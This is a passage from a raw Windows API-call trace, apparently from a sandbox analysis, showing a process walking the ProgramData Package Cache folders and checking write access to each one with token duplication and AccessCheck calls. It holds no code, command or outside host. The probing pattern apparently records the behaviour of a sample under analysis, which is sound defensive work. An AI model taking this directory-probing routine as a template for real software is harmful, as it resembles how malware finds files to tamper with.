lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.242] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.242] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0 [0106.242] FindClose (in: hFindFile=0x5fc1d8 | out: hFindFile=0x5fc1d8) returned 1 [0106.242] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0 [0106.242] FindClose (in: hFindFile=0x5fc358 | out: hFindFile=0x5fc358) returned 1 [0106.242] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.242] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.242] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.242] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.242] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.242] GetLastError () returned 0x7a [0106.242] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", RequestedInformation=0x7, pSecurityDescriptor=0x572cc0, nLength=0xcc, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x572cc0, lpnLengthNeeded=0x281baf8) returned 1 [0106.242] GetLastError () returned 0x7a [0106.242] GetCurrentThread () returned 0xfffffffe [0106.242] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.242] GetCurrentProcess () returned 0xffffffff [0106.242] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.242] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.242] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.242] AccessCheck (in: pSecurityDescriptor=0x572cc0, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.242] CloseHandle (hObject=0x344) returned 1 [0106.242] CloseHandle (hObject=0x33c) returned 1 [0106.242] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.243] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.243] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.243] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.243] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.243] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.243] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.243] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.243] GetLastError () returned 0x7a [0106.243] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", RequestedInformation=0x7, pSecurityDescriptor=0x572cc0, nLength=0xcc, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x572cc0, lpnLengthNeeded=0x281baf8) returned 1 [0106.243] GetLastError () returned 0x7a [0106.243] GetCurrentThread () returned 0xfffffffe [0106.243] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.243] GetCurrentProcess () returned 0xffffffff [0106.243] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.244] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.244] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.244] AccessCheck (in: pSecurityDescriptor=0x572cc0, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.244] CloseHandle (hObject=0x344) returned 1 [0106.244] CloseHandle (hObject=0x33c) returned 1 [0106.244] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.244] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.244] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0x5fc358 [0106.244] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281b560) returned 0 [0106.244] GetLastError () returned 0x7a [0106.244] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages", RequestedInformation=0x7, pSecurityDescriptor=0x28a63f0, nLength=0xcc, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x28a63f0, lpnLengthNeeded=0x281b560) returned 1 [0106.244] GetLastError () returned 0x7a [0106.244] GetCurrentThread () returned 0xfffffffe [0106.244] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x0) returned 0 [0106.244] GetCurrentProcess () returned 0xffffffff [0106.244] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x344) returned 1 [0106.244] DuplicateToken (in: ExistingTokenHandle=0x344, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281b564 | out: DuplicateTokenHandle=0x281b564*=0x32c) returned 1 [0106.244] MapGenericMask (in: AccessMask=0x281b574, GenericMapping=0x281b544 | out: AccessMask=0x281b574) [0106.244] AccessCheck (in: pSecurityDescriptor=0x28a63f0, ClientToken=0x32c, DesiredAccess=0x120116, GenericMapping=0x281b544, PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c | out: PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c) returned 1 [0106.244] CloseHandle (hObject=0x32c) returned 1 [0106.244] CloseHandle (hObject=0x344) returned 1 [0106.244] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.244] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.244] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\*", lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0x5fc1d8 [0106.245] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281afc8) returned 0 [0106.245] GetLastError () returned 0x7a [0106.245] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64", RequestedInformation=0x7, pSecurityDescriptor=0x28a6518, nLength=0xcc, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x28a6518, lpnLengthNeeded=0x281afc8) returned 1 [0106.245] GetLastError () returned 0x7a [0106.245] GetCurrentThread () returned 0xfffffffe [0106.245] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x0) returned 0 [0106.245] GetCurrentProcess () returned 0xffffffff [0106.245] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x32c) returned 1 [0106.245] DuplicateToken (in: ExistingTokenHandle=0x32c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281afcc | out: DuplicateTokenHandle=0x281afcc*=0x340) returned 1 [0106.245] MapGenericMask (in: AccessMask=0x281afdc, GenericMapping=0x281afac | out: AccessMask=0x281afdc) [0106.245] AccessCheck (in: pSecurityDescriptor=0x28a6518, ClientToken=0x340, DesiredAccess=0x120116, GenericMapping=0x281afac, PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4 | out: PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4) returned 1 [0106.245] CloseHandle (hObject=0x340) returned 1 [0106.245] CloseHandle (hObject=0x32c) returned 1 [0106.245] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.245] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.245] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.245] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0 [0106.245] FindClose (in: hFindFile=0x5fc1d8 | out: hFindFile=0x5fc1d8) returned 1 [0106.246] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0 [0106.246] FindClose (in: hFindFile=0x5fc358 | out: hFindFile=0x5fc358) returned 1 [0106.246] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.246] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.246] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.246] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.246] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.246] GetLastError () returned 0x7a [0106.246] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}", RequestedInformation=0x7, pSecurityDescriptor=0x572cc0, nLength=0xcc, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x572cc0, lpnLengthNeeded=0x281baf8) returned 1 [0106.246] GetLastError () returned 0x7a [0106.246] GetCurrentThread () returned 0xfffffffe [0106.246] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.246] GetCurrentProcess () returned 0xffffffff [0106.246] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.246] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.246] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.246] AccessCheck (in: pSecurityDescriptor=0x572cc0, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.246] CloseHandle (hObject=0x344) returned 1 [0106.246] CloseHandle (hObject=0x33c) returned 1 [0106.246] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.246] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.246] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.246] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.246] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.246] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.247] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.247] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.247] GetLastError () returned 0x7a [0106.247] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017", RequestedInformation=0x7, pSecurityDescriptor=0x572cc0, nLength=0xcc, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x572cc0, lpnLengthNeeded=0x281baf8) returned 1 [0106.247] GetLastError () returned 0x7a [0106.247] GetCurrentThread () returned 0xfffffffe [0106.247] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.247] GetCurrentProcess () returned 0xffffffff [0106.247] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.247] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.247] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.247] AccessCheck (in: pSecurityDescriptor=0x572cc0, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.247] CloseHandle (hObject=0x344) returned 1 [0106.247] CloseHandle (hObject=0x33c) returned 1 [0106.247] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.247] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.247] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0x5fc358 [0106.247] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281b560) returned 0 [0106.247] GetLastError () returned 0x7a [0106.247] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages", RequestedInformation=0x7, pSecurityDescriptor=0x28a63f0, nLength=0xcc, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x28a63f0, lpnLengthNeeded=0x281b560) returned 1 [0106.248] GetLastError () returned 0x7a [0106.248] GetCurrentThread () returned 0xfffffffe [0106.248] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x0) returned 0 [0106.248] GetCurrentProcess () returned 0xffffffff [0106.248] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x344) returned 1 [0106.248] DuplicateToken (in: ExistingTokenHandle=0x344, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281b564 | out: DuplicateTokenHandle=0x281b564*=0x32c) returned 1 [0106.248] MapGenericMask (in: AccessMask=0x281b574, GenericMapping=0x281b544 | out: AccessMask=0x281b574) [0106.248] AccessCheck (in: pSecurityDescriptor=0x28a63f0, ClientToken=0x32c, DesiredAccess=0x120116, GenericMapping=0x281b544, PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c | out: PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c) returned 1 [0106.248] CloseHandle (hObject=0x32c) returned 1 [0106.248] CloseHandle (hObject=0x344) returned 1 [0106.248] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.248] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.248] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\*", lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0x5fc1d8 [0106.248] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281afc8) returned 0 [0106.248] GetLastError () returned 0x7a [0106.249] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86", RequestedInformation=0x7, pSecurityDescriptor=0x28a6518, nLength=0xcc, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x28a6518, lpnLengthNeeded=0x281afc8) returned 1 [0106.249] GetLastError () returned 0x7a [0106.249] GetCurrentThread () returned 0xfffffffe [0106.249] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x0) returned 0 [0106.249] GetCurrentProcess () returned 0xffffffff [0106.249] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x32c) returned 1 [0106.249] DuplicateToken (in: ExistingTokenHandle=0x32c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281afcc | out: DuplicateTokenHandle=0x281afcc*=0x340) returned 1 [0106.249] MapGenericMask (in: AccessMask=0x281afdc, GenericMapping=0x281afac | out: AccessMask=0x281afdc) [0106.249] AccessCheck (in: pSecurityDescriptor=0x28a6518, ClientToken=0x340, DesiredAccess=0x120116, GenericMapping=0x281afac, PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4 | out: PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4) returned 1 [0106.249] CloseHandle (hObject=0x340) returned 1 [0106.249] CloseHandle (hObject=0x32c) returned 1 [0106.249] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.249] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.249] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.249] FindNextFileW (in: hFindFile=0x5fc1d8, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0 [0106.249] FindClose (in: hFindFile=0x5fc1d8 | out: hFindFile=0x5fc1d8) returned 1 [0106.249] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0 [0106.249] FindClose (in: hFindFile=0x5fc358 | out: hFindFile=0x5fc358) returned 1 [0106.249] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.249] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.249] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.249] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.250] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.250] GetLastError () returned 0x7a [0106.250] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017", RequestedInformation=0x7, pSecurityDescriptor=0x572cc0, nLength=0xcc, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x572cc0, lpnLengthNeeded=0x281baf8) returned 1 [0106.250] GetLastError () returned 0x7a [0106.250] GetCurrentThread () returned 0xfffffffe [0106.250] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.250] GetCurrentProcess () returned 0xffffffff [0106.250] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.250] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.250] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.250] AccessCheck (in: pSecurityDescriptor=0x572cc0, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.250] CloseHandle (hObject=0x344) returned 1 [0106.250] CloseHandle (hObject=0x33c) returned 1 [0106.250] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.250] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.250] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0x5fc358 [0106.250] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281b560) returned 0 [0106.250] GetLastError () returned 0x7a [0106.251] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages", RequestedInformation=0x7, pSecurityDescriptor=0x28a63f0, nLength=0xcc, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x28a63f0, lpnLengthNeeded=0x281b560) returned 1 [0106.251] GetLastError () returned 0x7a [0106.251] GetCurrentThread () returned 0xfffffffe [0106.251] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x0) returned 0 [0106.251] GetCurrentProcess () returned 0xffffffff [0106.251] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x344) returned 1 [0106.251] DuplicateToken (in: ExistingTokenHandle=0x344, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281b564 | out: DuplicateTokenHandle=0x281b564*=0x32c) returned 1 [0106.251] MapGenericMask (in: AccessMask=0x281b574, GenericMapping=0x281b544 | out: AccessMask=0x281b574) [0106.251] AccessCheck (in: pSecurityDescriptor=0x28a63f0, ClientToken=0x32c, DesiredAccess=0x120116, GenericMapping=0x281b544, PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c | out: PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c) returned 1 [0106.251] CloseHandle (hObject=0x32c) returned 1 [0106.251] CloseHandle (hObject=0x344) returned 1 [0106.251] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.251] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.251] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Package 